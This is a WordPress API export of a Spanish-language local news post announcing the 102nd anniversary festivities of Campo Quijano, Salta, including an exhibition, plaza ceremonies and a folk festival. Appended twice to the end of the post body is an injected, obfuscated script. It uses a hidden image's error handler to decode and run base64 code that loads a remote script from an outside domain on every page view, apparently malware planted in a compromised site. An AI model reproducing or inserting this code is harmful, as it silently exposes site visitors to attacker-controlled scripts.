{"id":2821,"date":"2023-07-05T14:49:08","date_gmt":"2023-07-05T17:49:08","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2821"},"modified":"2025-08-14T00:13:27","modified_gmt":"2025-08-14T03:13:27","slug":"se-realizo-el-anuncio-de-las-actividades-por-el-102o-aniversario-de-campo-quijano","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2821","title":{"rendered":"Se realiz\u00f3 el anuncio de las actividades por el 102\u00ba Aniversario de Campo Quijano"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#d30b3d\"><em>Fogones, gastron\u00f3micos, muestras del Patrimonio Cultural, academias y festivales comprenden las actividades para celebrar el aniversario del Portal de los Andes este fin de semana.<\/em><\/h4>\n\n\n\n<p>Campo Quijano cumple 102\u00ba a\u00f1os y lo festeja con diferentes actividades culturales y tur\u00edsticas. Este viernes a partir de las 10 H se podr\u00e1 acceder a la Expo Lucky 2023 \u201cRetrospectiva fotogr\u00e1fica de Campo Quijano y su gente\u201d presentada por el artista pl\u00e1stico Lucas Flores, bajo la tem\u00e1tica homenaje a las bodas de oro del Colegio Secundario Ing. Ricardo Fountaine Maury, Biblioteca Popular General G\u00fcemes y otras instituciones pioneras de nuestro pueblo en la Casa de la Cultura del municipio.<\/p>\n\n\n\n<p>El d\u00eda s\u00e1bado 8 de julio, se realizar\u00e1n intervenciones a partir de las 19H en Plaza Mart\u00edn Fierro. De esta forma, dar\u00e1 inicio la velada art\u00edstica con presentaciones de academias y artistas locales en la Glorieta de la Plaza. A las 00H del d\u00eda domingo 9, se entonar\u00e1 el Himno, se realizar\u00e1 el baile Peric\u00f3n Nacional, para dar lugar al tradicional corte de torta y brindis con vino hervido.<\/p>\n\n\n\n<p>Durante la jornada del 9 de julio, se realizar\u00e1 el Solemne Tedeum en la Parroquia Santiago Ap\u00f3stol. Asimismo, se desarrollar\u00e1n los actos protocolares y el desfile Patrio de instituciones sobre Avenida 9 de Julio. Finalmente, a partir de las 14 H se realizar\u00e1 el Festival Folkl\u00f3rico con la participaci\u00f3n del Chaque\u00f1o Palavecino, Cristian Herrera, La Repandilla, entre otros en el Club Uni\u00f3n Huaytiquina. Las entradas se encontrar\u00e1n disponibles durante las jornadas de s\u00e1bado y domingo en el predio del club, en Salta \u2013 Capital en San Mart\u00edn 1376, o a trav\u00e9s de Viva Ticket con recargo. Por dudas y consultas podes comunicarte al 3875022692.<\/p>\n\n\n\n<p>Participaron del anuncio el secretario de Cultura,&nbsp;<strong>Diego Ashur<\/strong>; directora de desarrollo de destinos del Ministerio de Turismo y Deportes,&nbsp;<strong>Soledad Issa<\/strong>; directora de Turismo y Cultura de Campo Quijano,&nbsp;<strong>Laura Soto<\/strong>; junto a los productores&nbsp;<strong>Diego Aguilar<\/strong>,&nbsp;<strong>Hugo Aguilar y Juan Carlos Yonar<\/strong>.<\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Fogones, gastron\u00f3micos, muestras del Patrimonio Cultural, academias y festivales comprenden las actividades para celebrar el aniversario del Portal de los Andes este fin de semana. Campo Quijano cumple 102\u00ba a\u00f1os y lo festeja con diferentes actividades culturales y tur\u00edsticas. Este viernes a partir de las 10 H se podr\u00e1 acceder a la Expo Lucky 2023 [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2822,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14,15],"tags":[],"class_list":{"0":"post-2821","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios","8":"category-provincial"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2821"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2821"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2821\/revisions"}],"predecessor-version":[{"id":7035,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2821\/revisions\/7035"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2822"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2821"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2821"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2821"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}